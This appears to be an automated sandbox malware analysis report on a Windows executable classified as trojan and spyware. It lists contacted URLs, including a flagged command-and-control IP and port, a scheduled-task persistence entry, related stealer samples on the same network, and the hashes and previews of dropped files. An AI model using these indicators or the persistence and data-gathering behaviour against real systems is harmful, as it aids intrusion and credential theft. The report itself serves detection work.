                                    http://tempuri.org/Endpoint/VerifyUpdateResponseI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0I5pvP0CU6M.exe, VcihjWRO.exe.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/Endpoint/SetEnvironmentVcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentResponseI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://tempuri.org/Endpoint/GetUpdatesVcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://45.137.22.248:55615I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002BC0000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003392000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://api.ipify.orgcookies//settinString.RemovegI5pvP0CU6M.exe, I5pvP0CU6M.exe, 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2004/08/addressingI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://tempuri.org/Endpoint/GetUpdatesResponseI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/Endpoint/EnvironmentSettingsResponseI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://tempuri.org/Endpoint/VerifyUpdateI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://tempuri.org/0I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameI5pvP0CU6M.exe, 00000000.00000002.2219893866.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 0000000B.00000002.2314956361.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp2937.tmp.9.dr, tmp8E66.tmp.17.dr, tmpF261.tmp.9.dr, tmp5F2D.tmp.9.dr, tmpC887.tmp.17.dr, tmpC865.tmp.17.dr, tmp8E44.tmp.17.dr, tmp8E55.tmp.17.dr, tmpC876.tmp.17.dr, tmp285.tmp.17.dr, tmpC844.tmp.17.dr, tmpF271.tmp.9.dr, tmp2957.tmp.9.dr, tmp265.tmp.17.dr, tmpF250.tmp.9.dr, tmp2905.tmp.9.dr, tmpC855.tmp.17.dr, tmpF282.tmp.9.dr, tmp2926.tmp.9.dr, tmpC897.tmp.17.dr, tmp2916.tmp.9.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/soap/actor/nextI5pvP0CU6M.exe, 00000009.00000002.2325569956.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2427530855.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        45.137.22.248
                                                        		unknownNetherlands
                                                        		51447ROOTLAYERNETNLtrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1548177
                                                        Start date and time:2024-11-04 04:31:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 11s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:24
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:I5pvP0CU6M.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:68b2a6e71c0c904a9aeabfc9adbf7a21.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@23/103@1/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 117
                                                        • Number of non-executed functions: 9
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        04:32:04Task SchedulerRun new task: VcihjWRO path: C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        22:31:54API Interceptor38x Sleep call for process: I5pvP0CU6M.exe modified
                                                        22:32:01API Interceptor39x Sleep call for process: powershell.exe modified
                                                        22:32:05API Interceptor34x Sleep call for process: VcihjWRO.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        45.137.22.248New_Order_-_PSFK23TT002.exeGet hashmaliciousGuLoaderBrowse
                                                        • 45.137.22.248/eQobTNPQQm56.bin
                                                        BOQ.00987578.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 45.137.22.248/ZIWRb187.bin

                                                        Domains

                                                        No context

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ROOTLAYERNETNLgLsenXDHxP.exeGet hashmaliciousRedLineBrowse
                                                        • 185.222.58.240
                                                        DEVIS + FACTURE.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 45.137.22.126
                                                        PZNfhfaj9O.exeGet hashmaliciousRedLineBrowse
                                                        • 185.222.58.80
                                                        ZxS8mP8uE6.exeGet hashmaliciousRedLineBrowse
                                                        • 45.137.22.123
                                                        nu28HwzQwC.exeGet hashmaliciousRedLineBrowse
                                                        • 185.222.58.52
                                                        DKO6uy1Tia.exeGet hashmaliciousRedLineBrowse
                                                        • 45.137.22.70
                                                        3BOCQ22aUs.ps1Get hashmaliciousUnknownBrowse
                                                        • 45.137.20.45
                                                        Order Proposal.exeGet hashmaliciousRedLineBrowse
                                                        • 45.137.22.121
                                                        l2rMtmFkD6.exeGet hashmaliciousRedLineBrowse
                                                        • 185.222.58.233
                                                        HJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
                                                        • 185.222.58.113

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\I5pvP0CU6M.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VcihjWRO.exe.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2232
                                                        Entropy (8bit):5.380805901110357
                                                        Encrypted:false
                                                        SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:lGLHyIFKL3IZ2KRH9OugQs
                                                        MD5:D0EF8E4DD120F790DD4A5434452024B2
                                                        SHA1:2C48DCEC4D2B6914EC9D50CFD9C252F4ACA64E86
                                                        SHA-256:8F8FB9D5320955882AC16C0025398A4443496B123BB532D92CFA80E78BB98497
                                                        SHA-512:B1022D646EDFDFAD447992363C54EA5D270A8EEEFD2730BE56143BBB8B24945AC65D2AFCECC7600431362773921C8809B57A6364B8FF3C640B47FDF41B6E71EA
                                                        Malicious:false
                                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5tpih14z.yk0.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0vwjbqx.fll.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dghh0soi.uwv.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kaxql43h.pew.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhksdfem.gmf.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzagapvg.woe.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohrjecxe.gd0.ps1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfytb5jv.0jq.psm1

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\tmp265.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp285.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp28F4.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmp2905.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.136471148832945
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                        Malicious:false
